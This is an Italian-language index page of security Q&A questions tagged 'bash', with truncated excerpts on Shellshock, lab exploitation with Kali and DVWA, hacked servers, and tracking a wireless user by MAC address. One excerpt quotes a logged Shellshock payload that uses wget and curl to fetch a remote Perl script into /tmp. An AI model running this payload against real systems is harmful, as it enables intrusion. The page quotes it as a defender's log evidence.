Domande con tag 'bash'

domande con tag
4
risposte

Che aspetto hanno gli attacchi shellshock nei log di sistema? [chiuso]

Ho alcuni server Linux, che da quello che posso dire non sono vulnerabili al vettore di attacco shellshock, ma sono curioso di sapere come appare l'attacco nei log. Che aspetto ha un attacco di successo nei log di appache2? Che aspetto avrebbe u...
posta 26.09.2014 - 14:25
3
risposte

MSFConsole / Kali Linux: ottieni l'accesso come root al sistema unix

Sto scherzando con Kali Linux, MSFConsole e DVWA (dannatamente vulnerabile applicazione Web). Sono riuscito a entrare nel sistema con successo (Raspberry Pi) creando una backdoor PHP e caricandola tramite SQL injection. Ora ho accesso al s...
posta 09.08.2015 - 19:29
2
risposte

server Hacked Ubuntu, probabilmente comandi hackerati (netstat, ps, ...), come sostituirli? [duplicare]

Un server Ubuntu della mia azienda è stato hackerato per eseguire un attacco DoS. Ho trovato che il bug shellshock non era stato risolto dai miei colleghi, e penso che sia il problema. Quindi, ho trovato un file ELF che invia migliaia di m...
posta 28.11.2014 - 12:28
1
risposta

Shellshock Exploit evidence: è un attacco riuscito

Stavo controllando i log oggi e ho notato quanto segue: 62.219.116.107 - - [26/Dec/2016:15:16:08 -0100] "GET / HTTP/1.0" 200 13501 "-" "() { :;}; /bin/bash -c \"wget http://[redacted]/bo.pl -O /tmp/bo.pl;curl -o /tmp/bo.pl http://[redacted]/b...
posta 27.12.2016 - 02:36
2
risposte

Come si traccia la pulizia della cronologia di bash?

Mi piacerebbe prendere gli eventi quando la cronologia di bash è stata pulita o alcune righe sono state cancellate. Esistono best practice o strumenti di auditing con questa funzionalità?     
posta 24.07.2017 - 17:02
5
risposte

Scenario di attacco shellshock che sfrutta php

Ho visto scenari di attacco che implicano l'uso di wget su cgi-script, ma che dire di uno scenario che sfrutta uno script php del server Web che emette una chiamata di exec() o system() a uno script bash? Per quanto ne so, le variab...
posta 26.09.2014 - 13:54
1
risposta

Elenca le stazioni wireless intorno a me

Sto cercando un utente wireless specifico intorno a me, ho il suo indirizzo MAC, ho persino il canale su cui si trova. Ho provato iwlist peers , senza alcun risultato, così come airodump. Ho visto il suo mac apparire sotto l'airodump, ma...
posta 08.09.2016 - 02:30
2
risposte

Do sudo e .profile / .bashrc abilitano l'escalation di privilegi banali?

Prima di tutto, lasciatemi menzionare che sto assumendo una configurazione configurata dalle attuali distribuzioni desktop Linux (per esempio Debian, Fedora). Sono sicuro che ci sono metodi che, se implementati, attenuerebbero i problemi descrit...
posta 11.06.2018 - 02:32
1
risposta

Quando Shellshock è stato introdotto, quanto è stato male ** allora **?

Il bug shellshock e la funzione sottostante che consente l'importazione di funzioni dall'ambiente (lo chiamo FIE), sono state in bash almeno dal 1993, prima dell'ascesa di CGI. A quel tempo, il resto dell'ambiente Unix / Linux / GNU era molto...
posta 30.09.2014 - 11:45
5
risposte

Devo rimuovere bash dal contenitore della mia web app Docker?

Supponiamo di essere un dev e di voler rafforzare il mio ambiente applicativo web. Se la mia applicazione non utilizza binari come sh, ls, find, echo, ecc. Dovrei semplicemente rimuoverli dalla mia immagine?     
posta 22.03.2018 - 07:25